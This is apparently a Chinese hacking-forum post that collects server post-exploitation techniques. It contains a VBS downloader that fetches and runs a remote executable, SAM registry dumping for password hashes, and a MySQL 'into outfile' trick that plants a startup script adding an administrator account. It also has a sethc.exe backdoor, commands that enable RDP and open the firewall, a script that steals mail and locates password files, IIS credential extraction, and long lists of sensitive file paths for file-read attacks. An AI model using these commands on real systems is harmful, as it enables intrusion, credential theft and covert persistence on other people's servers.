感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
8 j& H- m5 {! h: Z9 A5 p————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
{
0 I% G# |/ e: v0 J7 n注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
/ ^" g7 U: U, ~7 ^2 k" C, X' c那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
}  
/ m7 f& b7 G" B$ R
; Q5 L# Q2 d! g提权先执行systeminfo
token 漏洞补丁号 KB956572
- O7 U) b, k) S1 C3 G5 T7 VChurrasco          kb952004
命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
——————————————
+ N: q3 F/ M/ V8 t+ m2 \$ s2、收集系统信息的脚本  
7 M+ I" V- y- q( a1 Kfor window：

9 U  S( S6 D/ p+ ]* C8 H@echo off
/ O" a0 p% R( R' I5 A8 |/ n7 jecho #########system info collection
- Y; H$ P0 F6 s: E$ tsysteminfo
ver
hostname
net user
net localgroup
' K% n5 G; l3 z( V, @* O# Xnet localgroup administrators
  }8 r% Q6 ]) f3 i. O. `net user guest
6 ]: V+ V2 a$ s& Knet user administrator

' X" z3 ^: B) Q0 ^echo #######at- with   atq#####
! M' I: b  h, X$ |4 x6 ]9 n0 ]echo schtask /query
3 f0 q+ u4 F+ O3 J$ Z: s. S
echo
" a3 n$ l% G- x' D7 \5 E7 eecho ####task-list#############
tasklist /svc
5 N* m' W0 l1 V1 @4 W3 vecho
echo ####net-work infomation
ipconfig/all
) a% `9 @0 V  f, U0 Y( Hroute print
' U  e5 a9 @6 I' M* d$ f0 Rarp -a
netstat -anipconfig /displaydns
: s7 w9 n- _4 D9 G/ k) Zecho
3 j7 W9 e) ?% c3 j7 q" }- P( Oecho #######service############
sc query type= service state= all
echo #######file-##############
0 K( H8 ]  J$ g7 wcd \
% u: p1 l8 ]$ [& v! B5 F; k5 a: V/ itree -F
" v: t: m/ }/ H3 u: E( B  gfor linux：
. ?. t% |9 o( [7 H1 G+ p' x9 ?
#!/bin/bash

echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
) D; n+ l4 l- {2 W" Y5 M- V* L# |8 M. Hecho #######basic infomation##
. g7 ?' J& x* M) @* x8 F" M3 Xcat /proc/meminfo
1 E- x% d' b' E2 ^; C2 decho
cat /proc/cpuinfo
echo
rpm -qa 2>/dev/null
- h; x0 g% q2 H######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
/ G( O* m0 G7 w* a8 O+ L

echo 'u'r id is' `id`
echo ###atq&crontab#####
/ [: E' W! V/ \9 Gatq
crontab -l
6 ~  {% l/ W# z+ p; {  vecho #####about var#####
* r) Q% R* {& M% h! D" zset

. z/ Z8 k' \7 M4 A$ |  ]echo #####about network###
####this is then point in pentest,but i am a new bird,so u need to add some in it
' l- c8 \, M6 G9 ycat /etc/hosts
hostname
* k4 P" a8 w# gipconfig -a
arp -v
echo ########user####
cat /etc/passwd|grep -i sh

echo ######service####
) _% e4 c+ w1 k. t- W! d9 achkconfig --list

for i in {oracle,mysql,tomcat,samba,apache,ftp}
' [* ~2 L: Z5 t- Y" {- zcat /etc/passwd|grep -i $i
done
1 ~- z. s/ d' S9 d" G: L# f
, B( x' Y# C& T& g$ {0 \locate passwd >/tmp/password 2>/dev/null
sleep 5
locate password >>/tmp/password 2>/dev/null
sleep 5
! r6 \6 x  |- A+ H9 V) ^. b0 D* {locate conf >/tmp/sysconfig 2>dev/null
sleep 5
locate config >>/tmp/sysconfig 2>/dev/null
+ U( h- {) m) ~9 H, esleep 5

* V4 ^/ P+ G2 j9 I! l###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
3 D* z6 U8 W+ }6 i  G; grm -rf /tmp/getmail /tmp/password /tmp/sysconfig
——————————————
9 M: V& I6 `6 o0 G1 d# N0 ?8 `3、ethash 不免杀怎么获取本机hash。
) l( c" [  C5 ?& E/ ~4 M2 @首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
2 f5 [7 w9 z0 A3 N$ u' e注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
; x2 n) H. k# Q2 k2 P9 }接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
) L, l, Y+ s* M) \, r' lhash 抓完了记得把自己的账户密码改过来哦！
据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
8 h) g, s( y+ M. t——————————————
4、vbs 下载者
/ Q* ?. @; ~: u1
$ I% I1 \" G% r  `. ?( }echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
2 g( \6 U* F4 x& Gecho sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
1 a6 [$ q: y- J4 x# |8 z5 L
6 f, ^7 ]8 x, Y; w7 }4 T$ h2
3 o/ M# g) P# u7 {* [0 XOn Error Resume Nextim iRemote,iLocal,s1,s2
" U; ?" _* W* E7 SiLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
9 u& l& @# ^" ^' X0 Ss1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
( H2 s2 G/ M. ?Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
, ?# {5 Z% A% t. y$ R  gsGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2

" J* X! R& g  Ecscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
# M9 ^- g  M  M% s
3 Z; P8 \# A6 u2 ~当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
9 }4 I* U' p3 L! A5 O5 f——————————————————
5、
  o; u  {& I& x1 y3 |0 q: K6 w1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
! i' h: @4 R+ t+ y9 ~2.开启XP&2003终端服务
; I' u( W' |  S4 T0 W- v* FREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
& C' i! Z5 |8 e: i; V8 T1 bREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
; ^0 J& o, X$ o9 N' U, f/ v* W————————————————
6、create table a (cmd text);
9 K& D5 L% ^( o. iinsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
& a# I$ _. p, o/ w7 r) o$ iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
4 ?! w0 \. I: Mselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
————————————————————
7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
6 `3 J/ t0 ?9 {/ g7 e_____
7 F6 F# V8 y& ^' ]* y4 R6 a2 y8 D8、for /d %i in (d:\freehost\*) do @echo %i

3 {1 a9 T6 @2 c& R6 P1 k0 F: A; @列出d的所有目录
  
  for /d %i in (???) do @echo %i
% p/ k1 Z% B& N
7 I1 V* _9 J5 Q& a把当前路径下文件夹的名字只有1-3个字母的打出来
: U. F9 L  p3 T
7 o) o2 Q& y9 b2.for /r %i in (*.exe) do @echo %i
  
以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出

. S9 C  q8 d, I: W$ {: Jfor /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i
( ?8 u. ^" I: R' z4 |! F4 Y9 w' w- e
3.for /f %i in (c:\1.txt) do echo %i
: }! p5 V7 b& U: U! A! O( G  
' q2 o3 m, P. X0 j2 @9 o7 R+ L  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中

" ?: Q( A: N0 P4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i

4 u1 ?0 F' u# S$ i# W  delims=后的空格是分隔符 tokens是取第几个位置
: @' U5 G/ \" T2 l8 _——————————
●注册表:
* d' G. G+ C" v6 ^" m3 a3 w1.Administrator注册表备份:
5 o$ E, u% Z" R' w3 rreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg

2.修改3389的默认端口:
/ h- n6 I+ \( A$ H2 JHKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
修改PortNumber.

3.清除3389登录记录:
8 d* L' J6 o6 Qreg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
; J. v- b$ `% M( J. Z3 H. g
4.Radmin密码:
reg export HKLM\SYSTEM\RAdmin c:\a.reg
2 \. o7 g4 s* Y$ g# m
! C6 b  b0 L4 Q- t/ s3 L( _8 \5.禁用TCP/IP端口筛选(需重启):
7 G$ `0 D" ], P: ?& JREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

4 A9 [$ T6 D0 l2 m( s6.IPSec默认免除项88端口(需重启):
. `8 R( d% Z' X' b6 t( Areg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
或者
! ]3 h, U) _2 v4 t9 knetsh ipsec dynamic set config ipsecexempt value=0
  x1 H& s! z- g! e$ H& g
* [. t0 }3 P9 T* b, U" n3 \7.停止指派策略"myipsec":
4 A5 Z  ?4 [; _; R2 ]5 Znetsh ipsec static set policy name="myipsec" assign=n
% g/ }. _" \9 t- L* y& @  Y6 r2 Z
- U; y' e3 x: t/ F8.系统口令恢复LM加密:
2 U6 }) h9 L7 ?# e; ?: Qreg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f
! D* G; `2 B0 E, c
9.另类方法抓系统密码HASH
. j3 ]) @, _/ t4 c5 F! Xreg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
* U" J3 o* |1 E0 w) n4 E
10.shift映像劫持
' d+ B( v- ]2 i1 H) Hreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
& [* b9 L) }; E* D% E
9 V4 }0 G+ J+ z& c8 s: K) Y) Freg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
6 q1 Q- U0 z8 j7 R' G1 y8 R-----------------------------------
1 h% }' l+ |1 I: F/ I, v& ^星外vbs(注：测试通过，好东西）
0 A6 r; f% K; j' aSet ObjService=GetObject("IIS://LocalHost/W3SVC")
8 o8 Y0 z5 j% V, |! aFor Each obj3w In objservice
childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
- r& e4 I( b5 d6 T! y& X- P3 Qif IsNumeric(childObjectName)=true then
: ^5 a" |5 U$ Lset IIs=objservice.GetObject("IIsWebServer",childObjectName)
0 ]  m6 L" y* a0 pif err.number<>0 then
: v$ R9 v, s. K8 h/ P9 U( n) nexit for
4 U0 \6 s6 E& L; K! t+ z4 F/ Omsgbox("error!")
1 q1 }, C. L7 z0 `2 M) Z, D. }wscript.quit
end if
" W6 L& C) z8 p# T, Qserverbindings=IIS.serverBindings
ServerComment=iis.servercomment
- e/ C. N: t; X/ ~3 J( Bset IISweb=iis.getobject("IIsWebVirtualDir","Root")
user=iisweb.AnonymousUserName
pass=iisweb.AnonymousUserPass
, _2 W: U7 m+ \1 Z+ h& `path=IIsWeb.path
! \' d6 [2 @* |- }! `! Ulist=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
3 P8 Q) T/ K) H: ~: e5 \end if
% H/ t$ ]. L' I  RNext
2 p, e8 [* _2 C' J% \3 [wscript.echo list
Set ObjService=Nothing
wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
3 z; |( `% F5 p8 A% U; jWScript.Quit
复制代码
. Y1 ^0 {1 t" {( v& M3 P! E$ q----------------------2011新气象，欢迎各位补充、指正、优化。----------------
1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
将folder.htt文件，加入以下代码：
6 `% z9 S5 E7 g$ \' y7 e% H<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
</OBJECT>
2 Z/ T, J+ \5 ^/ V, {# _复制代码
, J! R6 ?! w4 W5 S) m# e然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
7 p6 E# i! t" F8 wPS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
  L( b  Z0 {, P0 [# A, V2 Yasp代码，利用的时候会出现登录问题
. p" }" a8 r  ? 原因是ASP大马里有这样的代码：（没有就没事儿了）
7 {! u; v# U$ [& l: Y8 i url=request.severvariables("url")
这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
3 V; M6 A3 B' f- k* n3 T* A1 t 解决方法
, o$ F, u  O; `$ V% `4 ^4 K* N url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马
( G4 F7 P5 L/ s5 c$ G, ?- S7 u' k
" G7 P( v( }5 h; k( u0 r==============================================================
LINUX常见路径：

. ]0 Q; _$ {( N; t0 \0 H2 Z/etc/passwd
/etc/shadow
6 |. u, V: t& Q/etc/fstab
( p3 X, ~* }& y5 X, O( W( F2 S/etc/host.conf
" s, n% Q6 Q5 d: A7 Y1 i4 o2 ?9 I/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
, y6 Y( F$ R6 j% g% j/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
# x% I% l( t" G6 D5 q" Z8 C/var/httpd/conf/httpd.conf
9 e1 W; [+ r& J8 A8 Y/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
5 m' ~2 `* d, `0 U9 Y  b/var/www/index.php
' w3 J1 M. v# I- v* Q) l* s6 R/opt/www/conf/httpd.conf
' Z) ^+ o7 R- q8 R! K/opt/www/htdocs/index.php
6 b5 p3 J( t2 G7 p; d# V& O2 d/opt/www/htdocs/index.html
" n" B- u1 H: f: ~/usr/local/apache/htdocs/index.html
7 K/ y* a4 Q8 _/usr/local/apache/htdocs/index.php
- x) n- w) i- U+ t/usr/local/apache2/htdocs/index.html
4 R1 m; ]5 A0 `( \- \* y& @/usr/local/apache2/htdocs/index.php
  ~9 C) L! \6 P5 f# @/usr/local/httpd2.2/htdocs/index.php
1 x0 d2 W& l# j/ E1 ]& \4 U/usr/local/httpd2.2/htdocs/index.html
, h# l- |  @0 W- _, b5 q/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
; ^+ |- j$ Z6 _/etc/httpd/htdocs/index.php
% _; s5 Z: h9 g4 T* h' V- J/etc/httpd/conf/httpd.conf
0 V; y* {1 j! ^4 c" e9 g/etc/httpd/htdocs/index.html
/www/php/php.ini
' N4 T4 \. h, T1 v" q/www/php4/php.ini
4 _1 N  [. ], n  i- X8 S& C$ s/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
0 T) i% ]3 h: M* ]/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
1 v3 C2 h% ]" j; ^/ `/apache/apache2/conf/httpd.conf
8 G- S0 B9 J6 l* o1 O# _/etc/apache/apache.conf
/etc/apache2/apache.conf
# t5 ?; p2 e5 r" |" j/etc/apache/httpd.conf
, p9 n- c) O; p% f7 R/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
* D; u- [! N7 [* W. H6 L/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
4 L+ v) F) y" O  z: P; M( [, Z/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
9 P% k7 h3 U% Y& s: n' k( W8 c( ?9 g/etc/httpd/conf.d/httpd.conf
+ G2 Z* U) q) A% z7 I4 r8 B/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
, [9 [  ~0 d+ O0 |" S/etc/httpd/logs/access_log
) \" ^8 F  {1 i7 S* M, B! V8 z+ ?/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
+ q0 J, f/ }! S% R4 F/var/log/apache/access.log
* n" I8 M0 U# S& T: A( g* k/var/log/apache2/error_log
/var/log/apache2/error.log
+ A5 o7 x5 M7 G/var/log/apache2/access_log
. w8 |5 T" D) Z4 D/var/log/apache2/access.log
7 o" w% W+ i1 I% S8 m# e' B. P! v/var/www/logs/error_log
7 G0 S$ ~7 P# q4 M9 Q. j1 X/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
6 i9 c8 C! ?; J4 w* Z' |) w/usr/local/apache/logs/error_log
9 `+ @8 I: y1 r9 {/usr/local/apache/logs/error.log
  K% f8 g" H9 m& C/usr/local/apache/logs/access_log
! [0 c7 _3 h; H1 p/usr/local/apache/logs/access.log
: b! a; B! j( c6 l/var/log/error_log
) m: r, J# o& Q. ?, C# G2 r& V/var/log/error.log
5 k9 d6 P: U6 ?9 s3 w, D! g/var/log/access_log
! ~, I$ v5 H4 e( O4 h. n% l/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
1 c- U- [/ x7 U7 t/bin/php.ini
/etc/init.d/httpd
% ]3 O, J! A4 P9 ]( F- Z/etc/init.d/mysql
! ?) a* P8 K4 d+ Y4 _4 J/etc/httpd/php.ini
; T5 S9 D  O5 O- c- }8 X/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
: i5 ]5 t! Q& Q& T1 P/usr/local/lib/php.ini
' ]& H9 q$ X; q) {/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
$ d' B" R, R. X8 k6 I  ]/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
+ P9 T& |& [" l4 k+ `; E. s+ C/ @/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
  Y" _6 f  t% h8 }! u' d: y8 A! o/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
; r& ~# x  R2 \+ ~3 [$ x2 W$ F( o/usr/local/apache2/conf/php.ini
6 z/ s: e' F; f' N: k/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
1 E- z; c7 a+ t8 o+ p+ |2 Z/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
- Q* S  J: N- p% g# L6 d6 x# }/var/local/www/conf/httpd.conf
) c0 N: b7 n! C$ t: [3 `/etc/php/cgi/php.ini
( C7 d6 W/ W/ r/etc/php4/cgi/php.ini
+ U: G0 [& w" N8 w6 y& J$ n/etc/php5/cgi/php.ini
/php5/php.ini
5 J5 @& e% }3 o$ }/php4/php.ini
/php/php.ini
/PHP/php.ini
2 G7 y5 |" d9 R+ y, k2 y/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
7 A4 m$ n  l- g7 k( Q/var/log/mysql/mysql-bin.log
: _6 M) |2 I  o; U/var/log/mysql.log
( x' a" u+ a$ Y+ P# \/var/log/mysqlderror.log
" B' e, o1 p. G/var/log/mysql/mysql.log
- _6 n9 \' G! P2 \. [. M& T/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
$ o* p' L. z/ J4 i0 [  h/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
3 `( P5 x3 F" |, G/ ]) X' i5 b- H: b/etc/mysql/my.cnf
& s  {: Z) l$ [9 K4 Q/etc/my.cnf
/usr/local/cpanel/logs
  ?5 i; h; i) L) c/usr/local/cpanel/logs/stats_log
! Z  w8 X, E( Y6 `7 P5 s/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
' L# n/ v" q2 b3 J: m  i/ a/usr/local/cpanel/logs/license_log
, [$ q: w/ a5 B& B8 d9 J$ i' d/usr/local/cpanel/logs/login_log
+ Y' [; t  R) P5 Z/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini

2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）
7 s6 P. s2 c* f0 F
c:\windows\php.ini
c:\boot.ini
, q. h: q$ m1 O( c' g, Xc:\1.txt
c:\a.txt

c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
c:\CMailServer\WebMail\index.asp
7 |3 N& y7 c1 E, w/ q( _! p# ac:\program files\CMailServer\CMailServer.exe
+ [- e/ \# J% F: j, o- dc:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
C:\WinWebMail\Web\default.asp
: L: P! L' s2 H5 t# [C:\WINDOWS\FreeHost32.dll
C:\WINDOWS\7i24iislog4.exe
C:\WINDOWS\7i24tool.exe
! y3 e3 w8 @) Z, X1 z: L
7 s/ J4 \2 ]7 I; h& Xc:\hzhost\databases\url.asp

c:\hzhost\hzclient.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk

( O9 ?: L1 o1 k3 f" s  c4 _; RC:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
C:\WINDOWS\web.config
c:\web\index.html
c:\www\index.html
. A" k# S/ B5 ?' o' kc:\WWWROOT\index.html
c:\website\index.html
  M: ]. c2 o5 {8 q# w) kc:\web\index.asp
c:\www\index.asp
! q) S' t: P/ K4 G0 ^c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
c:\www\index.php
% j; F0 R* c" Y4 H9 _" ?* Jc:\WWWROOT\index.php
8 `1 d7 J2 [3 T0 z# }+ n# h5 Kc:\WWWsite\index.php
4 M. i8 V7 q( W9 Dc:\web\default.html
c:\www\default.html
c:\WWWROOT\default.html
- e% P6 H! V0 Q( x& w* ac:\website\default.html
c:\web\default.asp
- h9 C# L. n) y+ O$ r% Pc:\www\default.asp
c:\wwwsite\default.asp
0 V! s: Y4 D6 n% T& pc:\WWWROOT\default.asp
c:\web\default.php
' _, [+ ]; ^! K* U; W$ Oc:\www\default.php
7 `# Q. `& h& B  v( U+ J) R4 xc:\WWWROOT\default.php
6 x  T4 P- _8 Y7 kc:\WWWsite\default.php
+ J# b5 O/ p, @* h% y, AC:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
C:\Program Files\Microsoft Office\OFFICE10\winword.exe
. b! G# c9 q% Z4 S2 JC:\Program Files\Microsoft Office\OFFICE11\winword.exe
5 r9 w4 f# e8 v; [  ~) Y! j" UC:\Program Files\Microsoft Office\OFFICE12\winword.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
5 I! B1 n% K! C) T) T; Y! l! TC:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
5 [" d6 n3 M$ ~/ F4 s+ m1 bC:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
2 Y( M% L; Y: S7 ^c:\ravbin\store.ini
c:\rising.ini
C:\Program Files\Rising\Rav\RsTask.xml
- v6 L% w# V2 D) }3 y# GC:\Documents and Settings\All Users\Start Menu\desktop.ini
C:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
5 j) v, o6 u2 r% _. y% c4 cC:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
' i! c  u, h" m  {* W! m& L2 ^C:\Documents and Settings\Administrator\桌面\1.txt
& k- I& H6 V. w* L3 `4 l, hC:\Documents and Settings\Administrator\My Documents\a.txt
/ C5 j1 ^: Y3 w6 E$ x9 u0 P9 T% m0 fC:\Documents and Settings\Administrator\桌面\a.txt
C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
3 p3 g0 T  t) gE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
, x5 q: v3 Y7 V% s( ^' fC:\Program Files\RhinoSoft.com\Serv-U\Version.txt
9 u- B; Y8 ?8 p' q4 b/ J( |! AC:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
" }& x4 D1 z! V/ wC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
" U# }& v! v4 n/ j- {, r. n6 H4 PC:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
. P& b; G9 w. m  u& y1 C( e4 q0 O5 }' DC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
% X2 f, d& L, u' @C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
7 b4 d" F, w* u7 CC:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
* ~! r9 R1 j( p( @; e7 T  ^C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\bin\mysql.exe
c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
C:\Program Files\Oracle\oraconfig\Lpk.dll
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
: S, h+ g% @" }8 `( KC:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
8 H. B$ u' w% j+ hC:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
4 k& h: w/ r( K9 SC:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\system
, p( g- T; j# v# |c:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
. d' J! `2 S- C+ E/ f+ Zc:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
, p( K# z- u2 Y5 Z6 D& }c:\tomcat\bin\version.sh
& O$ r& x! g4 G7 y' a* zc:\program files\tomcat6\bin\version.sh
7 k) G: m3 Q) z; D# bC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
$ ?  G; s: E' c5 x1 F5 nc:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
& g8 z  H4 F: u2 Lc:\Apache2\Apache2\bin\Apache.exe
c:\Apache2\bin\Apache.exe
0 H' h& Z; v6 B8 b; Z4 \* I3 qc:\Apache2\php\license.txt
